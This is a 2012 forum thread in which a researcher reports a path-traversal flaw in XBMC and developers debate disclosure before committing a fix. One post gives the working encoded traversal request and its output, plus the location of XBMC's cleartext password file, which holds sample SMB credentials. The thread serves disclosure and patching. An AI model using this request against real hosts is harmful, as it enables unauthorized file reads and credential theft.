Security issues in XBMC

acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #1
Got several high risk security issues in XBMC, would like to come in contact with a main developer or someone in charge of XBMC security.

Thanks

Best Regards
Lucas
Martijn Offline
Team Kodi
Posts: 11,235
Joined: Jul 2011
Reputation: 162
Location: Dawn of time
Post: #2
just post what you found so they can look at it

Always read the XBMC online-manual, FAQ and search the forums before posting.
Do NOT e-mail Team-XBMC members asking for support. Read/follow the forum rules.
For troubleshooting and bug reporting, make sure you read this first

acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #3
(2012-10-31 21:58)Martijn Wrote:  just post what you found so they can look at it

By posting what I found I'd expose thousands of users running XBMC, perhaps 3rd party too, such as openelec etc....

Are you sure that is what you want?

Br,
Lucas
davilla Offline
Retired-Team-XBMC Developer
Posts: 11,478
Joined: Feb 2008
Reputation: 64
Post: #4
Any xbmc user that has xbmc directly exposed on the net is a fool :)


acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #5
(2012-10-31 22:01)davilla Wrote:  Any xbmc user that has xbmc directly exposed on the net is a fool :)

Alright... that's .. professionally said....

I'll coordinate a disclosure with the firm I work for, and post the vulnerabilities I have.
Usually takes about a day, since most vendors want to keep it under the lid until they have a patch.

Do you want them here, or in the bug tracker?

Best regards
Lucas
theuni Offline
Team-XBMC Communication Manager
Posts: 1,105
Joined: Oct 2007
Reputation: 2
Location: Atlanta, Ga, USA
Post: #6
Any vulnerability will be fixed with a public commit.

We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release.

If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly... so I'm not sure what "serious enough" would be.
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #7
(2012-10-31 22:14)theuni Wrote:  Any vulnerability will be fixed with a public commit.

We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release.

If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly... so I'm not sure what "serious enough" would be.

True story, not here to argue, your call.
There's a lot of things that shouldn't be exposed, that are exposed.

And yes, this dates back and affects Eden as well.
I'll post it tomorrow.

Best regards
Lucas
acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #8
Seems like this is going to take a couple of extra days, documents etc need to go through review for the coordinated disclosure.
Thanks for baring with me.

Best regards
Lucas
jmarshall Offline
Team-XBMC Developer
Posts: 26,228
Joined: Oct 2003
Reputation: 177
Post: #9
Quote: Thanks for baring with me.

I guess I can see how a security issue might be likened to being naked...

acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #10
You can find the full disclosure at http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf
Below is a summary of the File Traversal vulnerability, which allows an attacker to read any file on the system, with the same privileges as the XBMC process.
Since XBMC stores usernames and passwords in clear text, an attacker might be able to gain further access to the targeted machine with the found credentials.

File traversal vulnerability can be triggered with (Windows request) : http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini


---SNIP---
XBMC File traversal vulnerability

Severity: High

Affected:
XBMC 11 => Nightly build 20121028 Windows version
XBMCbuntu / XBMC 11 for Linux
XBMC 11 11.0 for Raspberry Pi
XBMC 11.0 Git:20120702-f3cd288 for Jailbroken AppleTV 2 version (Thanks to Matt "hostess" Andreko for the verification.)

Impact
Remote File traversal allows an attacker to read any file on the targeted system with the same privileges as XBMC.
Since XBMC stores SMB and other credentials in clear text on the computer running the service, an attacker could easily find
valid network credentials to gain further access. This could lead to full system compromise, or compromise other systems XBMC
has access to.

Request (Windows):
http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
Output:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo

XBMC Password file (which is unencrypted): /private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml
<passwords>
<path>
<from pathversion="1">smb://192.168.1.2/Movies</from>
<to pathversion="1">smb://someuser:somepass@192.168.1.2/Movies/</to>
</path>
<path>
<from pathversion="1">smb://192.168.1.2/tv</from>
<to pathversion="1">smb://someuser2:somepasspass2@192.168.1.2/tv/</to>
</path>
<path>
<from pathversion="1">smb://192.168.1.2/Music</from>
<to pathversion="1">smb://someuser3:somepass3@192.168.1.2/Music/</to>
</path>
</passwords>
---SNIP---

Best regards
Lucas
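The request in the post above works because `%5C` decodes to a backslash and the resulting `..` segments are followed out of the served directory. The following is an added example of the server-side containment check for that class of bug, not code from the post and not the XBMC fix; the function names `percent_decode` and `safe_relative_path` are hypothetical, and the requests in `main` are constructed in the shape of the one quoted.

```cpp
#include <cctype>
#include <iostream>
#include <optional>
#include <string>
#include <vector>

// Decode %XX escapes exactly once; malformed escapes and %00 are rejected.
std::optional<std::string> percent_decode(const std::string& in) {
    std::string out;
    for (std::size_t i = 0; i < in.size(); ++i) {
        if (in[i] != '%') { out += in[i]; continue; }
        if (i + 2 >= in.size() ||
            !std::isxdigit(static_cast<unsigned char>(in[i + 1])) ||
            !std::isxdigit(static_cast<unsigned char>(in[i + 2])))
            return std::nullopt;
        int value = std::stoi(in.substr(i + 1, 2), nullptr, 16);
        if (value == 0) return std::nullopt;
        out += static_cast<char>(value); i += 2;
    }
    return out;
}
// Map a request path to a path relative to the web root; nullopt if ".." climbs above it.
std::optional<std::string> safe_relative_path(const std::string& url_path) {
    auto decoded = percent_decode(url_path);
    if (!decoded) return std::nullopt;
    std::vector<std::string> parts;
    std::string seg;
    auto flush = [&]() {
        if (seg == "..") {
            if (parts.empty()) return false;   // would leave the root
            parts.pop_back();
        } else if (!seg.empty() && seg != ".") {
            parts.push_back(seg);
        }
        seg.clear();
        return true;
    };
    for (char c : *decoded + "/") {            // trailing '/' flushes the last segment
        if (c != '/' && c != '\\') { seg += c; continue; }  // '\' is a separator too
        if (!flush()) return std::nullopt;
    }
    std::string joined;
    for (const auto& p : parts) joined += (joined.empty() ? "" : "/") + p;
    return joined;
}
int main() {  // constructed requests, in the shape of the one quoted in the post
    for (std::string r : {"/index.html", "/..%5C..%5Cwindows%5Cwin.ini"})
        std::cout << r << " -> " << safe_relative_path(r).value_or("REJECTED") << "\n";
}
```

The returned path is only ever appended to the fixed web root, and nothing downstream may percent-decode it a second time.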
Tolriq Offline
Donor
Posts: 2,317
Joined: Jun 2009
Reputation: 68
Location: France
Post: #11
This was known for a very very long time :)

And is corrected in the last Frodo nightly with added security on the vfs handler.

When I first reported this the official answer was: don't put your Xbmc on the Internet, it's not secure :)

Check : http://forum.xbmc.org/showthread.php?tid=81173

Montellese Offline
Team-XBMC Developer
Posts: 3,682
Joined: Jan 2009
Reputation: 34
Location: Switzerland
Post: #12
It's the same vulnerability but in a different spot. I'll look into it.

Montellese Offline
Team-XBMC Developer
Posts: 3,682
Joined: Jan 2009
Reputation: 34
Location: Switzerland
Post: #13
Should be fixed with https://github.com/xbmc/xbmc/commit/bdff...ab52a65335. See how easy it is if you just post your findings here? ;)

PS: You mentioned "several high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?

(This post was last modified: 2012-11-04 15:23 by Montellese.)
amet Offline
Retired Team-Kodi Member
Posts: 4,113
Joined: Jul 2009
Reputation: 41
Location: Novi Sad / Dubai
Post: #14
But then there would be no official document and no drama

acidgen Offline
Junior Member
Posts: 10
Joined: Oct 2012
Reputation: 0
Post: #15
(2012-11-04 13:56)Tolriq Wrote:  This was known for a very very long time :)

And is corrected in the last Frodo nightly with added security on the vfs handler.

When I first reported this the official answer was: don't put your Xbmc on the Internet, it's not secure :)

Check : http://forum.xbmc.org/showthread.php?tid=81173

The nightly was still vulnerable last time I checked.
And if it has been known for a while, perhaps it's time to fix it?

Best regards
Lucas

(2012-11-04 15:45)amet Wrote:  But then there would be no official document and no drama

You can also say, no official document, nothing gets done.

Best regards
Lucas

(2012-11-04 15:21)Montellese Wrote:  Should be fixed with https://github.com/xbmc/xbmc/commit/bdff...ab52a65335. See how easy it is if you just post your findings here? ;)

PS: You mentioned "several high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?

Nice, way faster than most :)

Yeah, currently investigating if it's exploitable or not. At least a DoS. If it's just a DoS I'll post it in the bug forums.
There's two possible issues that are in the 'works'.

You'll know when I know.

Best regards
Lucas
(This post was last modified: 2012-11-04 16:57 by acidgen.)